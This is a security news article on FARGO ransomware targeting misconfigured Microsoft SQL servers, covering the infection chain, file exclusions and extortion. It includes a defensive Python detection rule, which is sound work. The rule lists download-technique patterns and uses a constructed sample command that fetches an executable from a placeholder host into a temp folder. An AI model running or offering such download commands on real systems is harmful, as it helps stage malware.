A new ransomware campaign against misconfigured database management systems has come to the attention of security researchers. Multiple vulnerable Microsoft SQL servers are being targeted by the operators of FARGO ransomware. Taking these database management systems out of service can severely disrupt business operations.

A similar wave of attacks on database management systems was observed in February, dropping Cobalt Strike Beacon.

Vulnerable SQL Servers Under Attack

  • Researchers from AhnLab Security Emergency Response Center (ASEC) have reported that FARGO and GlobeImposter ransomware actors are jointly exploiting MS SQL servers to launch attacks.
  • FARGO is a new version of Mallox ransomware, which previously appended the .mallox extension to the files it encrypted.

Infection and Execution Process

  • The researchers note that the infection begins on a compromised Microsoft SQL server, where a .NET file is downloaded via cmd.exe and powershell.exe.
  • That payload downloads additional malware, including the locker, and generates and runs a BAT file that terminates specific processes and services.
  • During the infection process, the ransomware excludes certain software and directories from encryption so that the targeted system does not become completely unusable. The exempted items include the Tor Browser, Internet Explorer, user customizations and settings, the debug log file, and the thumbnail database.
  • The locked files are appended with the .Fargo3 extension.
  • The victims are then threatened with the leaking of the stolen files unless they pay the ransom.
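As an added illustration (not code from the ASEC research or this article): a small detection rule, run over constructed process-creation events, that flags the initial step described above, a SQL Server process spawning cmd.exe or powershell.exe, and raises the severity when the child's command line carries download indicators. The parent process name sqlservr.exe, the Sysmon-style field names and the sample paths and URL are assumptions.

```python
import ntpath
import re

# Rule: the SQL Server service process (sqlservr.exe, an assumed parent name)
# should not normally spawn a command shell. When it does, alert at medium
# severity; if the command line also shows download activity, alert at high
# severity, matching the cmd.exe/powershell.exe download step in the article.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_INDICATORS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
    r"certutil.*-urlcache|bitsadmin|start-bitstransfer|https?://",
    re.IGNORECASE,
)

def classify_event(event):
    """Return None (not interesting), 'medium' or 'high' for one process-creation event."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent != "sqlservr.exe" or child not in SHELLS:
        return None
    if DOWNLOAD_INDICATORS.search(event.get("CommandLine", "")):
        return "high"
    return "medium"

def scan(events):
    """Run the rule over a list of events; return [(index, severity), ...] for hits."""
    hits = []
    for i, ev in enumerate(events):
        sev = classify_event(ev)
        if sev:
            hits.append((i, sev))
    return hits

# Constructed sample events in the shape of Sysmon Event ID 1 fields.
# Not real telemetry: paths and the URL are placeholders.
SQL_BINN = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",                      # benign admin use
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Service"},
    {"ParentImage": SQL_BINN + r"\sqlservr.exe",                     # shell from SQL: medium
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir C:\\backups"},
    {"ParentImage": SQL_BINN + r"\sqlservr.exe",                     # shell + download: high
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell -c "Invoke-WebRequest http://example.invalid/x.exe '
                    '-OutFile C:\\Windows\\Temp\\x.exe"'},
]

if __name__ == "__main__":
    for idx, sev in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {sev} - {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The same parent/child pairing can be expressed as a SIEM or EDR query; the regex list is a starting point and should be tuned against the environment's legitimate SQL Agent and maintenance jobs.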

Recommended Measures

MS-SQL server administrators should ensure that they use strong and unique passwords. Keeping the machines up to date with the latest security fixes is also highly advisable.
Cyware Publisher